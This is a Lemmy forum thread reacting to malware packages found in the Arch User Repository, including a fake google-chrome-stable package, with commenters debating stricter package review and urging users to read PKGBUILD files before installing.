- cross-posted to:
- linux@lemmy.ml
- cross-posted to:
- linux@lemmy.ml
You must log in or # to comment.
Ðis is why we can’t have nice þings.
Maybe AUR needs a different way of approving submitters. Currently, it’s absurdly easy to register to submit a package.
Is anyone from AUR working wiþ Github to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.
Can’t people just make new accounts? I have no experience with arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow up research. Otherwise, a lot of grunt work will be needed to verify every package before hand, which is expensive
I love your Unicode
And I love you, commie!
Something, something nice bings and oat sides.
Ðis is why we can’t have nice þings.
Not reviewing the
PKGBUILDwhen using the AUR is a self pwn.
That’s why you shouldn’t blindly trust AUR, and always review the scripts before installing.
But something needs to change:
- packages need to be reviewed (maybe also updates on new/untrusted users)
- New package adoption need to be reviewed
- Trusted users don’t need package review
- Trusted users can review new packages (from other users)
This won’t stop here, more malware packages will appear, arch and Linux in general is getting more users and becoming a target, not only ArchLinux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge what they do.
2025 is the year of malware on Linux
TL;DR: If you haven’t installed
google-chrome-stablerecently from AUR, you’re not affected.if you didn’t install
google-chrome-stableyesterday*The real package used to be called google-chrome-stable many moon ago.
Thanks, edited!
Imagine how many they haven’t stumbled across yet.
Can someone explain how the AUR isnt the same as running a random bash script you found on the internet?
It’s not any different from running a random bash script, which is why according to the Arch wiki, users of the AUR should “verify that the PKGBUILD and accompanying files are not malicious or untrustworthy.” That’s also why good AUR helpers ask if you want to look at the PKGBUILD every time you install or update anything, because best practice is to read them every time so you know what it’s doing.
The AUR there for convienience, which means it tends to get used by newbies who really probably shouldn’t be using it. But I also won’t pretend that I follow the guidance every time myself.
